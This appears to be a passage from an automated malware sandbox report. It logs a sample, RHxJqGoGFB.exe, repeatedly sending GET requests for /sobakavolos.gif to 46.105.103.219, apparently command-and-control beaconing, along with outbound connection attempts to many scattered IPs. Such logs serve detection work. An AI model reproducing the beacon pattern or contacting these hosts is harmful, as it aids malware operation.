                                                                                                          Nov 26, 2024 11:43:35.156292915 CET575767940192.168.2.4191.43.4.101
                                                                                                          Nov 26, 2024 11:43:35.481232882 CET575776976192.168.2.45.204.242.202
                                                                                                          Nov 26, 2024 11:43:36.272540092 CET522445415192.168.2.441.77.183.102
                                                                                                          Nov 26, 2024 11:43:36.792428017 CET522455777192.168.2.4175.102.10.34
                                                                                                          Nov 26, 2024 11:43:38.098237991 CET522466130192.168.2.4123.27.55.144
                                                                                                          Nov 26, 2024 11:43:38.512839079 CET522477948192.168.2.494.156.127.59
                                                                                                          Nov 26, 2024 11:43:39.102977991 CET522485078192.168.2.4200.205.47.222
                                                                                                          Nov 26, 2024 11:43:49.213700056 CET538045092192.168.2.4114.41.80.242
                                                                                                          Nov 26, 2024 11:43:50.261027098 CET538056755192.168.2.492.87.163.40
                                                                                                          Nov 26, 2024 11:43:50.786691904 CET538066018192.168.2.4189.45.44.210
                                                                                                          Nov 26, 2024 11:43:51.312537909 CET502475188192.168.2.423.92.221.54
                                                                                                          Nov 26, 2024 11:43:51.838980913 CET502486755192.168.2.459.93.199.71
                                                                                                          Nov 26, 2024 11:43:53.182832956 CET502495335192.168.2.4119.189.3.27
                                                                                                          Nov 26, 2024 11:43:53.701483965 CET502507119192.168.2.4122.168.100.184
                                                                                                          Nov 26, 2024 11:43:54.213255882 CET502515415192.168.2.4180.218.251.35
                                                                                                          Nov 26, 2024 11:44:04.291388035 CET519464980192.168.2.4115.254.32.245
                                                                                                          Nov 26, 2024 11:44:05.543283939 CET519476373192.168.2.437.142.67.58
                                                                                                          Nov 26, 2024 11:44:06.359714031 CET519484879192.168.2.4113.161.196.135
                                                                                                          Nov 26, 2024 11:44:06.687232971 CET593446500192.168.2.4123.30.169.88
                                                                                                          Nov 26, 2024 11:44:07.197899103 CET593455890192.168.2.461.135.18.66
                                                                                                          Nov 26, 2024 11:44:08.317661047 CET593467411192.168.2.4190.37.87.100
                                                                                                          Nov 26, 2024 11:44:08.843302965 CET593477119192.168.2.4123.27.31.5
                                                                                                          Nov 26, 2024 11:44:09.355492115 CET593486195192.168.2.4190.204.201.41
                                                                                                          Nov 26, 2024 11:44:19.469168901 CET496907119192.168.2.4183.83.206.61
                                                                                                          Nov 26, 2024 11:44:20.538415909 CET496914245192.168.2.441.186.11.53
                                                                                                          Nov 26, 2024 11:44:21.596540928 CET493328180192.168.2.4189.13.99.195
                                                                                                          Nov 26, 2024 11:44:22.109692097 CET493335415192.168.2.4122.100.99.156
                                                                                                          Nov 26, 2024 11:44:22.643441916 CET493344756192.168.2.4117.196.243.174
                                                                                                          Nov 26, 2024 11:44:23.433443069 CET493358198192.168.2.4118.69.52.216
                                                                                                          Nov 26, 2024 11:44:23.948385000 CET493366989192.168.2.459.9.134.51
                                                                                                          Nov 26, 2024 11:44:24.468622923 CET493376511192.168.2.4200.8.30.163
                                                                                                          Nov 26, 2024 11:44:34.557241917 CET529196910192.168.2.4178.211.97.155
                                                                                                          Nov 26, 2024 11:44:35.620176077 CET529207620192.168.2.4189.13.136.81
                                                                                                          Nov 26, 2024 11:44:36.685698032 CET556626755192.168.2.4210.66.249.227
                                                                                                          Nov 26, 2024 11:44:37.206475973 CET556636142192.168.2.486.106.240.116
                                                                                                          Nov 26, 2024 11:44:37.733277082 CET556647990192.168.2.4189.25.10.24
                                                                                                          Nov 26, 2024 11:44:38.514025927 CET556657866192.168.2.478.187.175.231
                                                                                                          Nov 26, 2024 11:44:39.033978939 CET556666822192.168.2.4110.78.163.76
                                                                                                          Nov 26, 2024 11:44:39.543054104 CET556675380192.168.2.4190.36.155.238
                                                                                                          Nov 26, 2024 11:44:49.627845049 CET652356455192.168.2.4190.147.184.75
                                                                                                          Nov 26, 2024 11:44:50.637667894 CET555038455192.168.2.4118.69.244.25
                                                                                                          Nov 26, 2024 11:44:51.876120090 CET5550444848192.168.2.459.127.110.115
                                                                                                          Nov 26, 2024 11:44:52.238930941 CET555054588192.168.2.4179.212.232.131
                                                                                                          Nov 26, 2024 11:44:52.983604908 CET555068281192.168.2.4112.78.3.138
                                                                                                          Nov 26, 2024 11:44:53.730524063 CET555075549192.168.2.4130.204.120.42
                                                                                                          Nov 26, 2024 11:44:54.292901993 CET555087768192.168.2.4113.160.133.171
                                                                                                          Nov 26, 2024 11:44:54.793097019 CET555094245192.168.2.4202.59.129.35
                                                                                                          Nov 26, 2024 11:45:05.299108982 CET510195584192.168.2.4203.177.71.171
                                                                                                          Nov 26, 2024 11:45:05.721079111 CET578644440192.168.2.493.157.193.78
                                                                                                          Nov 26, 2024 11:45:07.228790045 CET578656130192.168.2.492.87.229.53
                                                                                                          Nov 26, 2024 11:45:07.967220068 CET578666636192.168.2.4177.70.129.10
                                                                                                          Nov 26, 2024 11:45:08.308675051 CET578675480192.168.2.4190.206.122.109
                                                                                                          Nov 26, 2024 11:45:08.841574907 CET578685415192.168.2.4186.94.161.129
                                                                                                          Nov 26, 2024 11:45:09.373784065 CET578696373192.168.2.441.103.106.172
                                                                                                          Nov 26, 2024 11:45:09.895978928 CET578704717192.168.2.4190.147.4.186
                                                                                                          Nov 26, 2024 11:45:20.415429115 CET594666538192.168.2.4113.171.248.2
                                                                                                          Nov 26, 2024 11:45:20.935151100 CET594675540192.168.2.491.244.214.41
                                                                                                          Nov 26, 2024 11:45:22.525954008 CET566045380192.168.2.4201.211.227.242
                                                                                                          Nov 26, 2024 11:45:23.188926935 CET566056554192.168.2.4177.9.220.111
                                                                                                          Nov 26, 2024 11:45:23.596563101 CET566067150192.168.2.4186.89.27.138
                                                                                                          Nov 26, 2024 11:45:24.143529892 CET566078032192.168.2.4177.125.164.144
                                                                                                          Nov 26, 2024 11:45:24.636811018 CET566084588192.168.2.4109.160.120.6
                                                                                                          Nov 26, 2024 11:45:25.160415888 CET566096304192.168.2.4186.233.253.245
                                                                                                          Nov 26, 2024 11:45:35.678066969 CET493334324192.168.2.4178.54.140.104
                                                                                                          Nov 26, 2024 11:45:36.075016022 CET493347866192.168.2.4202.164.40.66
                                                                                                          Nov 26, 2024 11:45:37.757313013 CET646465415192.168.2.4201.81.99.192
                                                                                                          Nov 26, 2024 11:45:38.415612936 CET646475089192.168.2.427.251.25.201
                                                                                                          Nov 26, 2024 11:45:38.810537100 CET646485415192.168.2.4190.37.212.191
                                                                                                          Nov 26, 2024 11:45:39.324346066 CET646496953192.168.2.486.124.69.204
                                                                                                          Nov 26, 2024 11:45:39.845958948 CET6465049928192.168.2.492.255.170.197
                                                                                                          Nov 26, 2024 11:45:40.375190020 CET646515460192.168.2.4203.98.101.59
                                                                                                          Nov 26, 2024 11:45:50.729861021 CET6502310510192.168.2.4121.42.25.3
                                                                                                          Nov 26, 2024 11:45:51.385540009 CET650245350192.168.2.4182.73.61.11
                                                                                                          Nov 26, 2024 11:45:52.914546967 CET627416219192.168.2.4190.204.170.165
                                                                                                          Nov 26, 2024 11:45:53.440800905 CET627429675192.168.2.469.195.140.124
                                                                                                          Nov 26, 2024 11:45:54.007905006 CET627435225192.168.2.485.65.46.116
                                                                                                          Nov 26, 2024 11:45:54.645344973 CET627444392192.168.2.4184.44.28.10
                                                                                                          Nov 26, 2024 11:45:55.123272896 CET627454539192.168.2.4110.164.71.147
                                                                                                          Nov 26, 2024 11:45:55.637487888 CET627465820192.168.2.4211.22.167.175
                                                                                                          Nov 26, 2024 11:46:05.928533077 CET635716228192.168.2.4218.208.102.21
                                                                                                          Nov 26, 2024 11:46:06.727567911 CET552865380192.168.2.436.224.135.49
                                                                                                          • 46.105.103.219
                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          0192.168.2.44973246.105.103.219807300C:\Users\user\Desktop\RHxJqGoGFB.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Nov 26, 2024 11:42:09.709120989 CET161OUTGET /sobakavolos.gif?6e1ab4=64942164 HTTP/1.1
                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)
                                                                                                          Host: 46.105.103.219
                                                                                                          Cache-Control: no-cache


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          1192.168.2.44973546.105.103.219807300C:\Users\user\Desktop\RHxJqGoGFB.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Nov 26, 2024 11:42:14.559591055 CET163OUTGET /sobakavolos.gif?102407c=118473572 HTTP/1.1
                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)
                                                                                                          Host: 46.105.103.219
                                                                                                          Cache-Control: no-cache


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          2192.168.2.44973746.105.103.219807300C:\Users\user\Desktop\RHxJqGoGFB.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Nov 26, 2024 11:42:19.505198002 CET162OUTGET /sobakavolos.gif?1a7967a=83280750 HTTP/1.1
                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)
                                                                                                          Host: 46.105.103.219
                                                                                                          Cache-Control: no-cache


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          3192.168.2.44974246.105.103.219807300C:\Users\user\Desktop\RHxJqGoGFB.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Nov 26, 2024 11:42:24.336519003 CET162OUTGET /sobakavolos.gif?247d6b5=76524906 HTTP/1.1
                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)
                                                                                                          Host: 46.105.103.219
                                                                                                          Cache-Control: no-cache


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          4192.168.2.44974546.105.103.219807300C:\Users\user\Desktop\RHxJqGoGFB.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Nov 26, 2024 11:42:29.163791895 CET163OUTGET /sobakavolos.gif?2e864a2=146353638 HTTP/1.1
                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)
                                                                                                          Host: 46.105.103.219
                                                                                                          Cache-Control: no-cache


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          5192.168.2.44974646.105.103.219807300C:\Users\user\Desktop\RHxJqGoGFB.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Nov 26, 2024 11:42:33.997087955 CET163OUTGET /sobakavolos.gif?387ee8e=177720234 HTTP/1.1
                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)
                                                                                                          Host: 46.105.103.219
                                                                                                          Cache-Control: no-cache


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          6192.168.2.44974746.105.103.219807300C:\Users\user\Desktop\RHxJqGoGFB.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Nov 26, 2024 11:42:38.809829950 CET162OUTGET /sobakavolos.gif?4289802=69769218 HTTP/1.1
                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)
                                                                                                          Host: 46.105.103.219
                                                                                                          Cache-Control: no-cache


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          7192.168.2.44974846.105.103.219807300C:\Users\user\Desktop\RHxJqGoGFB.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Nov 26, 2024 11:42:43.838835001 CET163OUTGET /sobakavolos.gif?4c8fe82=722530962 HTTP/1.1
                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)
                                                                                                          Host: 46.105.103.219
                                                                                                          Cache-Control: no-cache


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          8192.168.2.44974946.105.103.219807300C:\Users\user\Desktop\RHxJqGoGFB.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Nov 26, 2024 11:42:48.585593939 CET163OUTGET /sobakavolos.gif?55ce57c=359896560 HTTP/1.1
                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)
                                                                                                          Host: 46.105.103.219
                                                                                                          Cache-Control: no-cache


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          9192.168.2.44975046.105.103.219807300C:\Users\user\Desktop\RHxJqGoGFB.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Nov 26, 2024 11:42:53.365581036 CET163OUTGET /sobakavolos.gif?605f574=707376684 HTTP/1.1
                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)
                                                                                                          Host: 46.105.103.219
                                                                                                          Cache-Control: no-cache


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          10192.168.2.44975246.105.103.219807300C:\Users\user\Desktop\RHxJqGoGFB.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Nov 26, 2024 11:42:58.333689928 CET164OUTGET /sobakavolos.gif?6ac3c3a=1007558154 HTTP/1.1
                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)
                                                                                                          Host: 46.105.103.219
                                                                                                          Cache-Control: no-cache


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          11192.168.2.44975946.105.103.219807300C:\Users\user\Desktop\RHxJqGoGFB.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Nov 26, 2024 11:43:03.133934975 CET163OUTGET /sobakavolos.gif?746f30a=366270750 HTTP/1.1
                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)
                                                                                                          Host: 46.105.103.219
                                                                                                          Cache-Control: no-cache


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          12192.168.2.44977446.105.103.219807300C:\Users\user\Desktop\RHxJqGoGFB.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Nov 26, 2024 11:43:07.914680004 CET163OUTGET /sobakavolos.gif?7e81b91=530607684 HTTP/1.1
                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)
                                                                                                          Host: 46.105.103.219
                                                                                                          Cache-Control: no-cache


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          13192.168.2.44978646.105.103.219807300C:\Users\user\Desktop\RHxJqGoGFB.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Nov 26, 2024 11:43:12.820173979 CET163OUTGET /sobakavolos.gif?b40fdb1=566425875 HTTP/1.1
                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)
                                                                                                          Host: 46.105.103.219
                                                                                                          Cache-Control: no-cache


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          14192.168.2.44979746.105.103.219807300C:\Users\user\Desktop\RHxJqGoGFB.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Nov 26, 2024 11:43:17.573354006 CET165OUTGET /sobakavolos.gif?10c254e3=1687027026 HTTP/1.1
                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)
                                                                                                          Host: 46.105.103.219
                                                                                                          Cache-Control: no-cache


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          15192.168.2.44980846.105.103.219807300C:\Users\user\Desktop\RHxJqGoGFB.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Nov 26, 2024 11:43:22.767539978 CET165OUTGET /sobakavolos.gif?16620ca3=1502098060 HTTP/1.1
                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)
                                                                                                          Host: 46.105.103.219
                                                                                                          Cache-Control: no-cache


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          16192.168.2.44981946.105.103.219807300C:\Users\user\Desktop\RHxJqGoGFB.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Nov 26, 2024 11:43:28.155122995 CET166OUTGET /sobakavolos.gif?2700512b=-1677638484 HTTP/1.1
                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)
                                                                                                          Host: 46.105.103.219
                                                                                                          Cache-Control: no-cache


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          17192.168.2.44983446.105.103.219807300C:\Users\user\Desktop\RHxJqGoGFB.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Nov 26, 2024 11:43:33.046200037 CET165OUTGET /sobakavolos.gif?372892a3=1257467858 HTTP/1.1
                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)
                                                                                                          Host: 46.105.103.219
                                                                                                          Cache-Control: no-cache


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          18192.168.2.44984646.105.103.219807300C:\Users\user\Desktop\RHxJqGoGFB.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Nov 26, 2024 11:43:38.227262020 CET164OUTGET /sobakavolos.gif?3d30b7a9=838047309 HTTP/1.1
                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)
                                                                                                          Host: 46.105.103.219
                                                                                                          Cache-Control: no-cache


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          19192.168.2.44985746.105.103.219807300C:\Users\user\Desktop\RHxJqGoGFB.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Nov 26, 2024 11:43:43.519269943 CET166OUTGET /sobakavolos.gif?425e98d5=-1908960002 HTTP/1.1
                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)
                                                                                                          Host: 46.105.103.219
                                                                                                          Cache-Control: no-cache


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          20192.168.2.44986846.105.103.219807300C:\Users\user\Desktop\RHxJqGoGFB.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Nov 26, 2024 11:43:48.518910885 CET166OUTGET /sobakavolos.gif?53792577=-1494070546 HTTP/1.1
                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)
                                                                                                          Host: 46.105.103.219
                                                                                                          Cache-Control: no-cache


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          21192.168.2.44988046.105.103.219807300C:\Users\user\Desktop\RHxJqGoGFB.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Nov 26, 2024 11:43:53.275218010 CET166OUTGET /sobakavolos.gif?590aff39=-1307181454 HTTP/1.1
                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)
                                                                                                          Host: 46.105.103.219
                                                                                                          Cache-Control: no-cache


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          22192.168.2.44989146.105.103.219807300C:\Users\user\Desktop\RHxJqGoGFB.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Nov 26, 2024 11:43:58.102690935 CET164OUTGET /sobakavolos.gif?60d9e770=579712592 HTTP/1.1
                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)
                                                                                                          Host: 46.105.103.219
                                                                                                          Cache-Control: no-cache


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          23192.168.2.44990246.105.103.219807300C:\Users\user\Desktop\RHxJqGoGFB.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Nov 26, 2024 11:44:03.167335987 CET165OUTGET /sobakavolos.gif?7ccb59f9=1986137579 HTTP/1.1
                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)
                                                                                                          Host: 46.105.103.219
                                                                                                          Cache-Control: no-cache


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          24192.168.2.44991446.105.103.219807300C:\Users\user\Desktop\RHxJqGoGFB.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Nov 26, 2024 11:44:08.871280909 CET164OUTGET /sobakavolos.gif?8195d24a=265959140 HTTP/1.1
                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)
                                                                                                          Host: 46.105.103.219
                                                                                                          Cache-Control: no-cache


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          25192.168.2.44992546.105.103.219807300C:\Users\user\Desktop\RHxJqGoGFB.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Nov 26, 2024 11:44:13.804148912 CET166OUTGET /sobakavolos.gif?8756340a=-1778213858 HTTP/1.1
                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)
                                                                                                          Host: 46.105.103.219
                                                                                                          Cache-Control: no-cache


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          26192.168.2.44994046.105.103.219807300C:\Users\user\Desktop\RHxJqGoGFB.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Nov 26, 2024 11:44:18.683655024 CET165OUTGET /sobakavolos.gif?8d11c4a2=-174069326 HTTP/1.1
                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)
                                                                                                          Host: 46.105.103.219
                                                                                                          Cache-Control: no-cache


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          27192.168.2.44995146.105.103.219807300C:\Users\user\Desktop\RHxJqGoGFB.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Nov 26, 2024 11:44:23.593023062 CET164OUTGET /sobakavolos.gif?9241e677=612617454 HTTP/1.1
                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)
                                                                                                          Host: 46.105.103.219
                                                                                                          Cache-Control: no-cache


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          28192.168.2.44996246.105.103.219807300C:\Users\user\Desktop\RHxJqGoGFB.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Nov 26, 2024 11:44:28.456795931 CET165OUTGET /sobakavolos.gif?a34963b3=-371447015 HTTP/1.1
                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)
                                                                                                          Host: 46.105.103.219
                                                                                                          Cache-Control: no-cache


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          29192.168.2.44997346.105.103.219807300C:\Users\user\Desktop\RHxJqGoGFB.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Nov 26, 2024 11:44:33.262223005 CET165OUTGET /sobakavolos.gif?a74235ca=-343063876 HTTP/1.1
                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)
                                                                                                          Host: 46.105.103.219
                                                                                                          Cache-Control: no-cache


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          30192.168.2.44998446.105.103.219807300C:\Users\user\Desktop\RHxJqGoGFB.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Nov 26, 2024 11:44:38.143026114 CET165OUTGET /sobakavolos.gif?aea19a18=1564685360 HTTP/1.1
                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)
                                                                                                          Host: 46.105.103.219
                                                                                                          Cache-Control: no-cache


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          31192.168.2.44999546.105.103.219807300C:\Users\user\Desktop\RHxJqGoGFB.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Nov 26, 2024 11:44:43.021666050 CET165OUTGET /sobakavolos.gif?b104bfd4=-685687092 HTTP/1.1
                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)
                                                                                                          Host: 46.105.103.219
                                                                                                          Cache-Control: no-cache


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          32192.168.2.45000646.105.103.219807300C:\Users\user\Desktop\RHxJqGoGFB.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Nov 26, 2024 11:44:47.971929073 CET165OUTGET /sobakavolos.gif?b4156853=1747636390 HTTP/1.1
                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)
                                                                                                          Host: 46.105.103.219
                                                                                                          Cache-Control: no-cache


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          33192.168.2.45001946.105.103.219807300C:\Users\user\Desktop\RHxJqGoGFB.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Nov 26, 2024 11:44:53.108802080 CET166OUTGET /sobakavolos.gif?b8d36d83=-1675549809 HTTP/1.1
                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)
                                                                                                          Host: 46.105.103.219
                                                                                                          Cache-Control: no-cache


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          34192.168.2.45003246.105.103.219807300C:\Users\user\Desktop\RHxJqGoGFB.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Nov 26, 2024 11:44:58.338093996 CET165OUTGET /sobakavolos.gif?bd601994=2059416360 HTTP/1.1
                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)
                                                                                                          Host: 46.105.103.219
                                                                                                          Cache-Control: no-cache


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          35192.168.2.45004246.105.103.219807300C:\Users\user\Desktop\RHxJqGoGFB.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Nov 26, 2024 11:45:03.180468082 CET164OUTGET /sobakavolos.gif?c1fee9b0=267865472 HTTP/1.1
                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)
                                                                                                          Host: 46.105.103.219
                                                                                                          Cache-Control: no-cache


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          36192.168.2.45004346.105.103.219807300C:\Users\user\Desktop\RHxJqGoGFB.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Nov 26, 2024 11:45:08.107234001 CET164OUTGET /sobakavolos.gif?c535894d=349578548 HTTP/1.1
                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)
                                                                                                          Host: 46.105.103.219
                                                                                                          Cache-Control: no-cache


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          37192.168.2.45004446.105.103.219807300C:\Users\user\Desktop\RHxJqGoGFB.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Nov 26, 2024 11:45:13.254440069 CET166OUTGET /sobakavolos.gif?c977e755=-1829777750 HTTP/1.1
                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)
                                                                                                          Host: 46.105.103.219
                                                                                                          Cache-Control: no-cache


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          38192.168.2.45004546.105.103.219807300C:\Users\user\Desktop\RHxJqGoGFB.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Nov 26, 2024 11:45:18.511661053 CET164OUTGET /sobakavolos.gif?cc9358d1=843932484 HTTP/1.1
                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)
                                                                                                          Host: 46.105.103.219
                                                                                                          Cache-Control: no-cache


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          39192.168.2.45004646.105.103.219807300C:\Users\user\Desktop\RHxJqGoGFB.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Nov 26, 2024 11:45:23.393356085 CET166OUTGET /sobakavolos.gif?d0255c4e=-1325038046 HTTP/1.1
                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)
                                                                                                          Host: 46.105.103.219
                                                                                                          Cache-Control: no-cache


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          40192.168.2.45004746.105.103.219807300C:\Users\user\Desktop\RHxJqGoGFB.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Nov 26, 2024 11:45:28.527074099 CET166OUTGET /sobakavolos.gif?d42c48fe=-1470590468 HTTP/1.1
                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)
                                                                                                          Host: 46.105.103.219
                                                                                                          Cache-Control: no-cache


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          41192.168.2.45004846.105.103.219807300C:\Users\user\Desktop\RHxJqGoGFB.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Nov 26, 2024 11:45:33.549978971 CET165OUTGET /sobakavolos.gif?d7244def=-503438967 HTTP/1.1
                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)
                                                                                                          Host: 46.105.103.219
                                                                                                          Cache-Control: no-cache


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          42192.168.2.45004946.105.103.219807300C:\Users\user\Desktop\RHxJqGoGFB.exe
                                                                                                          TimestampBytes transferredDirectionData
